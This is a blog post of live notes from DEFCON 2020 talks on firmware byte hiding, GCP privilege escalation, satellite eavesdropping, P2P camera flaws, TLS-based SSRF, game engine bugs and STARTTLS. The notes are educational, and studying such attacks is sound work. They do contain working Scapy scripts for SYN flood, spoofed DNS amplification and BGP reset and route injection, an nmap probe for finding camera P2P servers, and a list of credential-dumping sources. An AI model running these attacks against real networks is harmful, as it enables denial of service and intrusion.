DEFCON 2020 Live Notes

I'm taking some time to attend DEFCON virtually this year. I'll be posting notes from talks, Q&A, and maybe even takeaways from "hallway" conversations I have here throughout the weekend.

I tend to focus mostly on webappsec, cloud security, and new exploits, but there are some interesting talks outside of my area of expertise I hope to find time for as well.

Sunday August 9th

Bytes in Disguise (⌐■_■)

This talk by Mickey Shkatov and Jesse Michael covers various places to hide bytes so endpoint protection is unlikely to find them - some very interesting places! GitHub for their demos

- Covering previous talk about keeping malware / payloads off disk (to avoid AV), in memory, and in particular in UEFI. This made EDR and AV blind to the UEFI variables.

- Where can we hide payload data so the time to detect is longer? UEFI Set/GetFirmwareEnvironmentVariable*, UEFI RT services.

- To enumerate attack surface: take apart the device and take hi-res photos (decent cell camera works) of the various hardware chips (can also try Googling teardown images of the model). Look for official schematics if possible (though finding schematics for modern hardware is rare). Find official docs that describe volatile and non-volatile memory components - Google hack: "flash" + "of volatility" filetype:pdf. You may find things like "128 bytes are protected by Intel. The other 128 bytes are not write-protected". But don't take the documents at their word (especially when one declares something as not user modifiable - usually that means it is not intended for user modification, but may not be write protected).

- Some places to hide bytes: CMOS, SPI, SPD, USB controllers, PCI bridges & endpoint devices, Displays/monitors, track/touch-pads

- CMOS: tiny non-volatile RAM backed by coin cell battery, located inside chip-set. Has a few unused bytes that are accessible via IO ports, but only 256 bytes and risk of bricking the system or disrupting PCR measurements (only mess with 0 value bytes). Demo bookmark

- SPI Flash: includes BIOS/UEFI, ME firmware, config data, platform specific regions and more. Often protected in modern systems, but sometimes permissions are not correct, or the permissions themselves are writable.

- SPD: Serial presence detect chip - the chip on a replaceable memory module that tells the system how to use it. It includes info about the memory module, and usually has unused space that is sometimes writable (read at boot, so overwriting values may brick the system until the module is removed). May not exist on systems with soldered memory. Usually only 256-512 bytes available.

- USB controllers, often on the motherboard with update-able firmware (a large number have unsigned updates). Demo bookmark. You can likely find similar spaces on most attached devices that have firmware (most of them). LAN ports are usually a good spot to look as well.

- How do we access SPI flash? The 'flash programming tool' (may require some digging to find) or firmware update tools from vendors. Demo bookmark. Even signed firmware images often only validate the block of data used - empty space is not included.

- Nearly all of this requires admin / Ring 0

- Recommended ASMio tool by Stefano Moioli (leveraged in some of the demos)
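The CMOS advice above (only mess with 0 value bytes) can be sketched as a small helper that lists runs of zero bytes in a dump. This is my own illustration, not code from the talk: the 256-byte dump is synthetic, and `zero_runs` and `min_len` are hypothetical names. Actually reading CMOS needs ring 0 / admin access, which is left out here.

```python
from typing import List, Tuple


def zero_runs(dump: bytes, min_len: int = 2) -> List[Tuple[int, int]]:
    """Return (offset, length) for each run of 0x00 bytes at least min_len long."""
    runs = []
    start = None
    for i, b in enumerate(dump):
        if b == 0:
            if start is None:
                start = i          # a new run of zeros begins here
        elif start is not None:
            if i - start >= min_len:
                runs.append((start, i - start))
            start = None
    # Handle a run that reaches the end of the dump.
    if start is not None and len(dump) - start >= min_len:
        runs.append((start, len(dump) - start))
    return runs


# Synthetic 256-byte "CMOS dump": non-zero everywhere except two zeroed regions.
dump = bytearray(b"\xa5" * 256)
dump[0x40:0x48] = bytes(8)
dump[0xF0:0x100] = bytes(16)

for offset, length in zero_runs(bytes(dump)):
    print(f"candidate region at 0x{offset:02x}, {length} bytes")
```

A zero byte is only a candidate, not a guarantee that the firmware ignores it, so the bricking risk noted above still applies.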

Lateral Movement and Privilege Escalation in GCP

This talk by Allison Donovan and Dylan Ayrey covers GCP attack techniques. I am interested in cloud security, but don't have any real experience with GCP.

- AWS has policies for users, GCP has policies for resources. Owner of a service account can't read the resource policies or even know if they have access. As a result, it isn't possible to know what a given user has access to - instead you have to look at a resource and see who has access to it. Service accounts can be granted access to resources from outside the organization (meaning it's really not possible to know what a given user has access to).

- An interesting scenario covered with GKE (Kubernetes): an admin creates a cluster with a service account, and the service account manages the nodes. Devs are given access to specific nodes. If a developer grants the Kubernetes service account access to some resource the dev owns (so their node can access it), this grants all nodes access to that resource, meaning any developer can access it, including ones added in the future - but the Kubernetes admin who owns the service account cannot know what resources have been granted! Sounds like a problem...

- Most resources are grouped into orgs which have inheritance. So, realistically, in the above scenario, you would end up with entire project level role bindings.

- This all means that granting anyone access to a service account is inherently risky - it is hard to really know what permissions that role has, unless you introspect all your own resources.

- They mapped out orgs from IAM entries committed into github to generate an org graph.

- The primitive editor role is pretty powerful: it has a lot of default permissions, including the ability to associate service accounts with resources, and this role is created by default on resource creation.

- Resources default to thousands of permissions.

- So how do we use this to move laterally in an organization? This becomes possible if a developer grants an act-as permission to something like the editor role.

- Demo: From a base identity via phishing, they use project listing, service accounts, and actas permissions to take control of service accounts.

- Major finding: if you have one service account with editor access on a project, and another service account with owner on that project, the editor level service account can always privilege escalate itself to owner. This is also true for developers with editor level!

- If one of the lateral moves hits an org role binding, can be used to get org access due to inheritance.

- Released tool Gcploit to automate this flow.

- Remediation: defensive script to map out the same flow that an attacker could exploit. Also, GCP IAM analyzer to analyze this (result of these findings)

- Also released some monitoring tools to identify someone using this tool in an environment.
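The lateral movement flow above is essentially a graph walk: start from one identity, follow "can act as" edges to service accounts, and see what roles you end up holding. A minimal sketch of that idea follows. This is not Gcploit; every identity, service account name, and role in the sample data is made up for illustration.

```python
from collections import deque


def reachable_service_accounts(start, act_as):
    """Breadth-first walk over 'identity can act as service account' edges."""
    seen = {start}
    queue = deque([start])
    while queue:
        identity = queue.popleft()
        for sa in act_as.get(identity, ()):
            if sa not in seen:
                seen.add(sa)
                queue.append(sa)
    seen.discard(start)  # report only what was gained, not the starting identity
    return seen


# Hypothetical bindings: who holds an act-as permission on which service account.
act_as = {
    "dev@example.com": ["sa-build"],
    "sa-build": ["sa-deploy"],
    "sa-deploy": ["sa-org-admin"],
    "sa-unrelated": ["sa-other"],
}
# Hypothetical roles held by each service account.
roles = {"sa-build": "editor", "sa-deploy": "owner", "sa-org-admin": "org admin"}

for sa in sorted(reachable_service_accounts("dev@example.com", act_as)):
    print(sa, "->", roles.get(sa, "unknown"))
```

The same walk works defensively: run it from every identity you own and review any path that ends at an owner or org level binding.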

Take down the internet with Scapy

This was a live session by John Hammond

I have used Scapy for many interesting things, but nothing too serious, so I was interested to see what else it could do. This talk is mostly about using Scapy to craft DoS attacks, old and new.

- What kind of disruptive attacks could be done? Goal of this talk is to describe attacks that just recklessly break things, and show how easy it is.

- Scapy is a packet crafting library for python - formulate TCP or UDP packets, CANbus, Bluetooth, and others.

- Some basic syntax to ping and print the response. It builds an ICMP packet and sends it to dst.

from scapy.all import *

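ping = IP(dst="192.168.1.1")/ICMP()

reply = sr1(ping, timeout=2)  # send the packet and wait for a single reply

print(reply.summary() if reply is not None else "no reply")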

- Ping of death attack: DoS by sending ping packets that are larger than the maximum allowable size. Scapy script:

send(fragment(IP(dst="192.168.10.5")/ICMP()/("X"*60000)))

Some systems are still vulnerable to this, though it's a pretty old and outdated attack.

- Syn Flood: try to consume all open TCP connections on a server by sending SYNs but never the final ACK, so each half-open connection is held by the server for a short time.

syn_flood = (IP(dst="192.168.1.1", id=1111, ttl=99)/

TCP(sport=RandShort(), dport=[80], seq=12345, ack=1000, window=1000, flags="S"))  # "S" flag indicates SYN

answered, unanswered = srloop(syn_flood, inter=0.3, retry=2, timeout=4)

- DNS amplification attack: DoS based on DNS resolver reflection. Basically, requesting a DNS entry with the source IP spoofed to the victim's, so that the victim gets many large DNS responses (here src is the victim IP). I am not sure how well this works with modern networks, because IP spoofing is largely blocked by networks at every hop, unless the victim is on the same network or geographically close.

dns_amp = (IP(src="192.168.10.5", dst="dns.nameserver.com")/UDP(dport=53)/

DNS(rd=1, qd=DNSQR(qname="google.com", qtype=255)))  # qtype 255 is ANY, sent to get max response size

send(dns_amp)

- BGP Abuse - BGP Hijacking, DoS, blind attacks to disrupt sessions or inject routing mis-configurations.

- Blind disruption - RST flag spoofed, victim would believe the BGP session was terminated. (To achieve this, the attacker has to be between the two routers.)

dport = 53154 # must match active session

seq_num = 123 # must also match traffic

ack_num = 456 # must also match traffic

bgp_reset = (IP(src="200.1.1.1", dst="200.1.1.3", ttl=1)/

TCP(dport=dport, sport=179, flags="RA", seq=seq_num, ack=ack_num))

send(bgp_reset)

- Blind injection of BGP - send malicious routing information to try and hijack the route

load_contrib("bgp")

dport = 53154

seq_num = 123

ack_num = 456

# Field names below follow the older Scapy BGP contrib layer; newer Scapy releases use different class and field names

path_origin = BGPPathAttribute(flags=0x40, type=1, attr_len=1, value=b"\x00")

path_AS = BGPPathAttribute(flags=0x40, type=2, attr_len=4, value=b"\x02\x01\x01\x2c")

path_next = BGPPathAttribute(flags=0x40, type=3, attr_len=4, value=b"\x64\x02\x03\x02")

path_exit = BGPPathAttribute(flags=0x80, type=4, attr_len=4, value=b"\x00\x00\x00\x00")

path_update = BGPUpdate(tp_len=25, total_path=[path_origin, path_AS, path_next, path_exit], nlri=[(24, "5.5.5.0")])

send(IP(src="200.1.1.1", dst="200.1.1.2", ttl=1)/

TCP(dport=dport, sport=179, flags="PA", seq=seq_num, ack=ack_num)/

BGPHeader(len=52, type=2)/path_update)

- Real life cases: in June 2019, Verizon had a BGP routing mishap that knocked about 15% of traffic off the internet, and Cloudflare had a BGP leak last month. Neither of these were attacks, just network misconfigurations.
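Going back to the ping of death item: the "maximum allowable size" comes from the 16-bit IP total length field, which caps a datagram at 65535 bytes. The arithmetic below is my own sketch (no Scapy needed) and assumes a 20-byte IP header with no options plus the 8-byte ICMP header.

```python
IP_HEADER = 20        # bytes, assuming no IP options
ICMP_HEADER = 8       # bytes, ICMP echo header
MAX_DATAGRAM = 65535  # largest value the 16-bit IP total length field can hold


def reassembled_size(payload_len: int) -> int:
    """Size of the full datagram once all fragments are put back together."""
    return IP_HEADER + ICMP_HEADER + payload_len


def exceeds_limit(payload_len: int) -> bool:
    """True when the reassembled ping would be larger than IP allows."""
    return reassembled_size(payload_len) > MAX_DATAGRAM


for payload in (60000, 65507, 65508):
    print(payload, reassembled_size(payload), exceeds_limit(payload))
```

By this arithmetic the 60000-byte payload in the one-liner above reassembles to 60028 bytes, which is still under the limit, so as written it exercises large fragmented pings rather than the classic overflow. The overflow case needs fragments whose offsets add up past 65535.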

Modern password & hash cracking

This is a live talk

- Gaming setups are best - GPU important. Cloud cracking can work well, about $.03 / Giga-hash hour. Built custom rig for $25k which gets 250 GH/hr (2017) - 6 x 1080's

- 8 char passwords can be cracked near instantly with one of these - should not be used in 2020. 12 char is now the minimum - 3 year crack time on NTLM hash (when not in word list)

- Some terms: masks - the makeup of a word broken up into its character sets. Like Password1 -> <P><assword><1> - 3 masks, which can be used to guess the makeup of characters. Most people start their password with a capital letter, follow it with lowercase letters, and end with numbers. Hybrid attack - brute force or mask appended/prepended to a wordlist. Wordlist - candidate words which can be modified with rules - usually dictionary words. Password Dump - file containing passwords found by previous cracking attempts - more complex words than a wordlist.

- Full kit: hashcat, hashtopolis, HashID, PW_spy

- Hashcat: de facto standard, replaced JohnTheRipper. Supports almost every hash imaginable and is very fast.

- Hashtopolis: wrapper for hashcat that manages agents, jobs, wordlists and binaries from a central location. Give it something to crack and it farms it out to various hashcat instances. Can help manage all the hashcat installs as well. This is really for the big enterprise engagements (cost of running multiple cloud jobs can be high)

- HashID - find the likely hashing algorithm if you are having trouble finding the type of hash, but not so helpful anymore. Another method is to self-register with a password, grab the hash that was created, and then try different methods.

- PW_spy - once some pw's have been cracked will find most common masks, weak passwords, common lengths, base words used in cracked set.

- Where to find passwords? hashdump for local accounts, /etc/shadow, mimikatz, web apps, responder, DCSync/NTDS, network snooping...

- some common password themes: local sports team (pro/college), local street names, <company_name><year_founded>, sometimes client or project names

- cracking progression (fastest first): Start with strong wordlist -> add rules -> loopback attacks -> 1-8 char pw brute force (24 hours for NTLM) -> masks.
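To make the mask idea concrete, here is a small sketch that turns a cracked password into a hashcat-style mask (?u upper, ?l lower, ?d digit, ?s symbol) and computes how many candidates that mask covers. The helper names are mine, and treating every non-alphanumeric character as ?s is a simplifying assumption.

```python
import string

# Sizes of hashcat's built-in charsets.
CHARSET_SIZE = {"?u": 26, "?l": 26, "?d": 10, "?s": 33}


def to_mask(password: str) -> str:
    """Map each character to its hashcat charset placeholder."""
    out = []
    for ch in password:
        if ch in string.ascii_uppercase:
            out.append("?u")
        elif ch in string.ascii_lowercase:
            out.append("?l")
        elif ch in string.digits:
            out.append("?d")
        else:
            out.append("?s")  # assumption: anything else counts as a symbol
    return "".join(out)


def keyspace(mask: str) -> int:
    """Number of candidates a mask covers (product of the charset sizes)."""
    total = 1
    for i in range(0, len(mask), 2):
        total *= CHARSET_SIZE[mask[i:i + 2]]
    return total


mask = to_mask("Password1")
print(mask, keyspace(mask))
```

Dividing the keyspace by your rig's hash rate gives a rough worst-case time for that mask, which is why common masks from already cracked passwords are worth trying before a full brute force.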

Saturday August 8th

Whispers Among the Stars (Satellite Eavesdropping)

This is a great talk by James Pavur on intercepting satellite data. The scope and scale of the findings are significant.

- Attack looked at 18 GEO satellites, covering about 100 million square km (huge area!)

- Able to intercept a lot of sensitive data - sometimes using vulnerabilities known since 2005. Traffic captured from military jets, industrial work, personal internet traffic, and more.

- Main problem with satellite communications: the initial request is generally sent on a very focused beam (limited geo), but the response is sent across a very wide geographic area, so many locations can be used to listen.

- Sat equipment is expensive - but TV sat dish works (~$300) with sat card (pro card about $300 also), so not too expensive for every day attackers.

- EBS Pro tool used to scan for internet service - check the Ku band, look for signal out of the noise (looked like big spikes on the demo) and tell the card to connect at that frequency looking for digital. The driver can then be used to listen in on the wire, and the saved traffic file can be grepped to find info. In the demo, SOAP API traffic was being sent.

- Legacy protocol used is MPEG-TS (the video streaming format), though this is still used fairly frequently. There are some good tools for working with: dvbsnoop, tsduck, TSReader.

- Modern protocol: GSE. Popular with enterprise customers, with high end hardware that made it hard for the low end tools used to capture all the data.

- Built GSExtract tool (not released at the time of these notes) to try to reconstruct IP packets from the feed - gives 60-70% of packets.

- Combined, this gives ISP level visibility to traffic. With enterprise customers, it is often treated as a trusted LAN communication, including finding some things like LDAP traffic - some companies, including utility companies, considered the satellite as a trusted network.

- Encryption would protect the content of the traffic, but some things that were intercepted: most DNS queries, HTTP headers, emails (intercepted attorney/client communication emails using POP3). This can allow things like password reset attacks by intercepting emails. BASIC auth strings, FTP with login details, SMB, cruise ship point of sale data, passport/visa data from ports, along with timestamps.

- Aviation findings: GSM cell connections sent clear text over satellite, leading to some text message intercepts and some air control data.

- Satellite communications could be used for undetectable data exfiltration - send data via satellite - even to something like a closed port or broken service on a ship somewhere, and the attacker can listen in.

- TCP session hijacking - depending on location of the attacker and the user, the attacker may be able to have certainty that their packets will arrive first.

- It is likely that nation states employ satellite technology that can expand significantly upon these attacks.
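As an example of what grepping a saved traffic file for BASIC auth strings looks like, here is a sketch that pulls HTTP Basic credentials out of raw captured bytes. The sample request is fabricated for illustration, and the function name is hypothetical. Nothing here is specific to the tools used in the talk.

```python
import base64
import re

# Matches "Authorization: Basic <base64>" anywhere in raw captured bytes.
BASIC_RE = re.compile(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def find_basic_credentials(capture: bytes):
    """Return a list of (user, password) pairs found in the capture."""
    creds = []
    for match in BASIC_RE.finditer(capture):
        try:
            decoded = base64.b64decode(match.group(1), validate=True)
        except ValueError:
            continue  # not valid Base64, skip it
        user, sep, password = decoded.decode("utf-8", "replace").partition(":")
        if sep:
            creds.append((user, password))
    return creds


# Fabricated sample request standing in for a chunk of a saved capture.
token = base64.b64encode(b"user:pass")
sample = b"GET / HTTP/1.1\r\nHost: example.invalid\r\nAuthorization: Basic " + token + b"\r\n\r\n"
print(find_basic_credentials(sample))
```

Base64 is encoding, not encryption, so anything sent this way over an unencrypted satellite link is effectively clear text.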

Using P2P to hack 3 million cameras

A really great talk by Paul Marrapese on how P2P features in cameras expose them to attack, including cameras behind firewalls. This one is scary - attacks are generally simple, persistent, and unlikely to go away any time soon.

- Hundreds of brands impacted by his findings - a $40 device can be used to accomplish this.

- Paul purchased a highly rated IP camera from Amazon and plugged it in, noticing that it could be viewed from his phone before setting up his firewall rules. Initial analysis: wireshark shows communications to 3 different servers across the globe, and the video feed sometimes going to other states.

- How was it bypassing his network? Using Peer to peer. Most cameras use third party P2P libraries.

- By design, P2P is meant to be exposed to internet, and can't be turned off on most devices. It does this by sending UDP packets through the NAT to the P2P server. The firewall will allow returning traffic by design. Other clients can use the same technique to open their own firewall. When the server returns the device IP/port, the same technique can be used to create direct communication (UDP hole punching).

- Manufacturers leverage some devices as relays (common in P2P as super nodes), which can't be opted out of.

- For more fun, you can get direct access to any device if you have its UID (which is guessable), and devices generally run ARM based BusyBox with every service as root.

- P2P servers are the gateway to the clients to orchestrate connections. Manufacturers keep dedicated servers for their own devices - usually listening on UDP port 32100.

- Most users connect via a device unique ID (UID), which is all that's needed to connect. Written to NVRAM during manufacturing, so unchangeable. UID has three parts - prefix-serial-checkCode

- Wireshark P2P dissector released to help look at the traffic (protocol details in talk)

- Find P2P servers by scanning cloud providers with Nmap UDP probes. Add udp 32100 "\xf1\x00\x00\x00" to /usr/share/nmap/nmap-payloads, then scan with nmap -n -sn -PU32100 --open -iL ranges.txt.

- Prefixes can be brute forced - P2P servers will respond with errors for invalid prefixes. He found about 488 distinct prefixes. Serial numbers are just sequential numbers. Check code is a modified MD5 (via finding iLnkP2P library).

- Most devices use default password, so UID is enough to access.

- Found buffer overflow without any overflow protections enabled, allows RCE to root shell.

- Interestingly, using that shell to get the MAC address and then giving the MAC to google geo location gives very accurate lat/long results.

- MitM also possible - with UID, forge login message to P2P service to have traffic routed to you instead of real device. Majority of IoT traffic not encrypted, log message 'encrypted' with Base64...

- Even easier MitM is to get a camera that becomes a super node in the P2P network... UID's leaked, and not detectable to users.

- Some of these things are being fixed by vendors, or have released patches, but it's unlikely users will patch.
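The prefix-serial-checkCode structure is what makes UIDs guessable, so here is a sketch of splitting a UID and walking sequential serials. The exact field widths in the regex and the sample UID are assumptions for illustration. The check code algorithm is not in my notes, so this deliberately stops short of generating complete UIDs.

```python
import re

# Assumed shape: letters prefix, 6-digit serial, 5-letter check code.
UID_RE = re.compile(r"^([A-Z]{3,8})-(\d{6})-([A-Z]{5})$")


def parse_uid(uid: str):
    """Split a UID into (prefix, serial, check_code)."""
    match = UID_RE.match(uid)
    if match is None:
        raise ValueError(f"unexpected UID format: {uid!r}")
    prefix, serial, check = match.groups()
    return prefix, int(serial), check


def sequential_serials(prefix: str, start: int, count: int, width: int = 6):
    """Neighbouring prefix-serial pairs; the check code is intentionally left out."""
    return [f"{prefix}-{n:0{width}d}" for n in range(start, start + count)]


prefix, serial, _check = parse_uid("FFFF-123456-ABCDE")  # made-up UID
print(sequential_serials(prefix, serial, 3))
```

Because serials are sequential, one valid UID from a single purchased camera is enough of a starting point to enumerate its neighbours.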

Online ads as recon and surveillance tool

This is a live talk in the crypto and privacy village.

Niel explores the possibility of using ad networks to harvest information about specific known targets.

- Previous research could use ads to tell if someone is blue team (with limitations) - for instance take out ads against specific hashes found in malware, then see who makes the search

- Trying to detect if it is possible to setup ads so it targets a specific individual, and if so, is it practical to do so.

- Scenario: Blue team user with Nexus 6 android and windows 10 VM, google/chrome user. Doesn't clear cookies. Attacker has a domain name, blog, business for advertising, and some accounts and VM's.

- Attacker puts some very specific search terms into a blog post (in this case, a bitcoin address, trojan string, with some other terms like not petya)

- Attacker wants to detect user search for specific terms - design ad with select low volume terms (but above the minimum threshold activity). Then narrow via demographics, but again not too narrow

- Eventually ad will show - if shown attacker gets full text of query that triggered the ad.

- This is not all that viable - not able to do very low volume terms, ads don't reliably display when you want, potential to have higher cost.

- Facebook allows much more detailed audience targeting, along with logical operators (AND/OR/XOR) - target interests, user data like life events, food/drink types, hobbies, etc. Behaviors are the most invasive - online + offline data, OS's, purchase behavior, travel, multicultural affinities, expat status; this draws on data collected from user devices, including location. When combined, these can target very specific audiences.

- Using include/exclude rules with location, you can target for instance everyone who has recently been in the US Capitol building.

- With facebook - it didn't trigger for the intended target, but did trigger for other users.

- Not fully proven, but seems that it is possible to gather information about a specific person by using multiple methods like re-targeting, and highly specific targeting.

- Defensive measures: Use opsec on search engines, be wary of data shared from devices (location on Android), etc.

Hackium Browser

I joined this talk by Jarrod Overson a little late (video). This is an incredibly interesting tool that looks like it can significantly help with JavaScript de-obfuscation, reverse engineering, and automatic manipulation of sites.

- Hackium (and related tools) help you to better understand how sites are using JS and the business logic built in. It's a Node.js library - can be installed with npm install -g hackium

- hackium exposes a REPL. It's based on Puppeteer, so any commands for Puppeteer or hackium work within it. REPL history is stored in .repl_history so it can be shared with others. This enables some nice ability to share cool manipulations of sites that goes beyond standard dev tool / proxy modifications. You can also use hackium init to create a shareable config file.

- Designed so that supposedly human events (mouse, keyboard) are built to look human - mistakes, proper mouse movement, variable timings between key presses.

- Can wire in captcha solving services like 2captcha to auto-solve captchas that may block the tool.

- Interceptors: templates to format JS or shift-refactor (transform nodes of a JavaScript syntax tree) - can be used to make JS more readable or dynamically change how the page works at load.

- A cool demo that shows how to de-obfuscate JS by dynamically replacing the obfuscated code using shift-refactor.

- A cool demo to find and expose internal JS functions on twitters page that allows

Differential Privacy

A talk by Miguel Guevara and Bryan Gipson about how to leverage and share useful data without compromising privacy.

- Google has made their differential privacy library open source (speakers are from Google)

- Core problem: how do we publish data in a way that preserves specific users' privacy?

- Removing PII is not enough - published de-identified records can be re-identified by combining them with other data sources.

- Aggregation or k-anonymity (at least k users in a given data set) helps, but this may not be enough if stats change over time in ways that expose information, such as a single user moving from or to an aggregation bucket. This could also be a problem if the bucket is sensitive (like a medical condition). Published data may be subject to differencing attacks, knowing someone is part of a bucket may be a problem, and people could be exposed if known bad data is injected - like 100 users in a bucket with 99 fake users.

- If we aggregate, but inject some randomness into each aggregate value - this is the differential privacy idea. Maintain statistical significance, without above risks.

- Practical aspects they take into account: a person can only be counted once in each metric, to avoid specific patterns (person A went to the grocery store 100 times today). Remove noisy metrics.

- Built a differential privacy sql engine, allowing querying a data set while maintaining privacy by applying per user transformations that affect joins and aggregations.
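The "aggregate, then inject randomness" idea can be sketched with the textbook Laplace mechanism on a count. This is not Google's library or its API, just a minimal illustration. The function names, the epsilon value, and the sample visits are all my own assumptions. It also shows the "each person is only counted once" rule, which is what keeps the sensitivity of the count at 1.

```python
import random


def laplace_noise(scale: float, rng: random.Random) -> float:
    """Laplace(0, scale) noise, drawn as the difference of two exponentials."""
    return rng.expovariate(1.0 / scale) - rng.expovariate(1.0 / scale)


def private_count(visits, epsilon: float, rng: random.Random) -> float:
    """Noisy count of distinct users; each user contributes at most once."""
    users = {user for user, _place in visits}
    sensitivity = 1.0  # adding or removing one user changes the count by at most 1
    return len(users) + laplace_noise(sensitivity / epsilon, rng)


# Made-up data: user "a" visits the store twice but is only counted once.
visits = [("a", "store"), ("a", "store"), ("b", "store"), ("c", "gym")]
print(private_count(visits, epsilon=0.5, rng=random.Random()))
```

A smaller epsilon means more noise and stronger privacy. Averaged over many users and buckets the noise washes out, which is how statistical usefulness survives.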

Friday August 7th

When TLS Hacks You

An interesting expansion on SSRF that enables new techniques for weaponizing SSRF when it doesn't appear exploitable, leveraging TLS fields containing payloads. Talk by Joshua Maddux.

- Initial demo is interesting - localhost running memcache and making a simple Curl request adds an attacker controlled cache entry.

- Turns out we can smuggle some data in the TLS handshake packets - Session ID (32 bytes) and Session Tickets (about 65 KB). These are saved between sessions to the same domain name (regardless of IP address).

- Full attack: setup site that crafts handshake with the payload in one of the fields above, and DNS that flips between actual site and localhost:port of vulnerable service, like memcache. SSRF the app to have it create a TLS connection to vulnerable site. Now, the server has cached the session information for attackerSite, but the next SSRF request has the DNS resolve to localhost.

- Payload will be sent with the TLS ClientHello to the localhost service as a result. Payload can include arbitrary characters like new lines, including memcached commands, de-serialization attacks, etc.

- Vulnerable sites: Those that have SSRF (which may have previously been unexploitable, such as with webhooks) which support TLS connections, and run services on local ports which accept unauthenticated TCP connections from localhost.

- Services verified susceptible: memcached, hazelcast, SMTP, FTP, some DB's (maybe), syslog.

- Demo of this technique using a phishing email + img tag on a page to get RCE on developer laptop running a local Django app with memcached. Nice!

- Defensive take away: proxy outbound requests from your infra, and don't run unauthenticated TCP software
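To get a feel for the size limits, here is a sketch that builds a memcached set command wrapped in newlines and checks which TLS field could carry it. The limits are the ones from the notes above, using the 16-bit maximum for tickets. The helper names are mine, and this only builds bytes locally - it does not speak TLS or talk to any server.

```python
SESSION_ID_MAX = 32          # bytes available in the session ID field
SESSION_TICKET_MAX = 65535   # session tickets carry a 16-bit length


def memcached_set(key: bytes, value: bytes) -> bytes:
    """memcached text protocol: set <key> <flags> <exptime> <bytes>, then the data."""
    # Leading newline so the command starts on a fresh line inside the handshake bytes.
    return b"\r\nset %s 0 0 %d\r\n%s\r\n" % (key, len(value), value)


def carrier_for(payload: bytes):
    """Pick the smallest handshake field the payload fits in, or None."""
    if len(payload) <= SESSION_ID_MAX:
        return "session_id"
    if len(payload) <= SESSION_TICKET_MAX:
        return "session_ticket"
    return None


small = memcached_set(b"k", b"v")
large = memcached_set(b"key", b"A" * 100)
print(len(small), carrier_for(small))
print(len(large), carrier_for(large))
```

The point of the newline wrapping is that line-oriented services like memcached skip the binary handshake garbage as bad commands and then execute the clean line that follows.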

Finding & Exploiting bugs in Multiplayer Game Engines

I sometimes build small games in my spare time for fun (most recently, a VR mermaid adventure for my daughter) so I find this topic interesting. I no longer have time to devote to most multiplayer style games, but I used to enjoy them. This talk by Jack Baker is mostly specific engine bugs that were discovered and fixed (except for Bug4).

- Looking at UNET (Unity networking library, deprecated, no alternatives, lots of indie games use it)

- Multiplayer games generally use a distributed architecture with RPC's to communicate, with state replicated in both the client and server. Most games use UDP (websocket for browser games), so protocol has to deal with auth & order issues.

- Bug1: UE4 uses specialized "URL"s to communicate, which sometimes include file names, allowing LFI, including remote SMB (fixed in UE4.25.2)

- Bug2: UNET / Unity, memory disclosure by sending a packet with a length field > data sent - UNET will read in other memory, which works similar to Heartbleed (chat messages can leak memory data back to us via this method). Fixed in 1.0.6

- Bug3: UE4 universal speed hack. UE4 checks the timestamp sent for movement against the last known valid timestamp seen from the player. These values are floating points, which given certain operations can become NaN (Not a Number): NaN poisoning. Since operations are via RPC, we can include NaN as our argument for timestamp, and the checking function treats the timestamp as valid. The NaN value propagates after a few requests until the server can no longer determine whether the client is modifying the time, allowing move speed changes. Interesting!

- Bug4: UNET session hijacking. Packets aren't validated by source IP - only by values within the packet: HostID, SessionID, and PacketID. HostIDs are assigned sequentially. SessionIDs are randomly generated at connection (16 bit) - brute-forceable. PacketID is also 16 bits, incremented with each packet. A spoofed packet can lead to the packet being discarded, accepted (correct guess), or the session being disconnected (too high) - kick other players. Not fixed, and unlikely to be fixed in the future - architectural issue. Can be limited with encryption, but that is not commonly used.
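The NaN poisoning in Bug3 works because every ordered comparison against NaN is false, so range checks written as "reject if too big / too small" silently pass. The sketch below is a toy in Python, not UE4's actual code. The function names and the MAX_STEP value are made up.

```python
import math

MAX_STEP = 0.5  # hypothetical: largest time step the server will accept, in seconds


def naive_timestamp_ok(last_ts: float, new_ts: float) -> bool:
    """Reject-style checks: NaN slips through because NaN < x and NaN > x are both False."""
    delta = new_ts - last_ts
    if delta < 0:
        return False
    if delta > MAX_STEP:
        return False
    return True


def strict_timestamp_ok(last_ts: float, new_ts: float) -> bool:
    """Same check, but non-finite values are rejected up front."""
    if not (math.isfinite(last_ts) and math.isfinite(new_ts)):
        return False
    return naive_timestamp_ok(last_ts, new_ts)


nan = float("nan")
print(naive_timestamp_ok(10.0, nan))       # the NaN timestamp is accepted
print(naive_timestamp_ok(nan, 999999.0))   # once stored, any later timestamp passes too
print(strict_timestamp_ok(10.0, nan))      # explicit finiteness check rejects it
```

The second call is the poisoning part: once NaN has been stored as the last valid timestamp, every later delta is NaN as well, so the check can never fail again.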

Detecting Fake 4G Base Stations in Real Time

I recently wrote about government surveillance of protests, including the use of sting rays (fake cell towers) to track protestors.

This talk by Cooper Quintin focuses on detecting devices that spoof a 4G tower.

- As I wrote previously, StingRay devices generally depend on older 2G network protocols to work. For 4G surveillance (HailStorm), EFF looked at changes in the standard: mutual authentication, better encryption, and in 4G the device no longer naively connects to strongest tower. (These are what make it difficult to spoof for surveillance)

- Vulnerabilities in 4G leveraged: pre-auth handshake attacks and downgrade attacks - initial setup methods are implicitly trusted. Recommend the Gotta Catch 'Em All IMSI paper by EFF for details.

- The initial (before the auth handshake occurs) 4G connection requests include some sensitive information such as IMSI, sometimes GPS coords, and ability to attempt to downgrade the connection to 2G.

- Data on how often these devices are used - ACLU published FOI request data showing hundreds or thousands of uses per year by both ICE/DHS and local law enforcement.

- Evidence that foreign spies (deployed around DC / the White House), criminals (drug cartels), and cyber mercenaries (NSO group) leverage these technologies.

- Current detection methods: apps (many false positives). Custom hardware based on radio (expensive, requires setup).

- Real life testing looking for cell simulators at Standing Rock found no 2G, assumed that all uses must be 4G.

- Releasing Crocodile Hunter software stack - runs on a laptop or Pi with SDR & LTE antennas.

STARTTLS is Dangerous

This is a live crypto village talk. Video bookmark to stream.

- STARTTLS most commonly used with email clients and servers - all Email protocols support it. Web uses implicit TLS generally.

- If a client supports downgrading to plain text when STARTTLS is not supported, then an active attacker can just claim that it isn't supported, and the client will connect anyway.

- IMAP alerts can be sent at any time (including during the plain text pre TLS communication), and the client will show it as coming from the server.

- Buffering bugs (CVE in 2011, but attacks not published at the time): If client sends multiple plain text packets prior to the handshake, most servers will process the plain text packets in the TLS session.

- If attacker (MitM for SMTP) sends a plain text with injected Auth, Mail, and Data - server will then go through the auth with the client, and the client can be forced to send credentials to the attacker.

- Similar attack with IMAP, but requires exact size ahead of time (so need to guess size of password), but attacker may be able to get multiple tries.

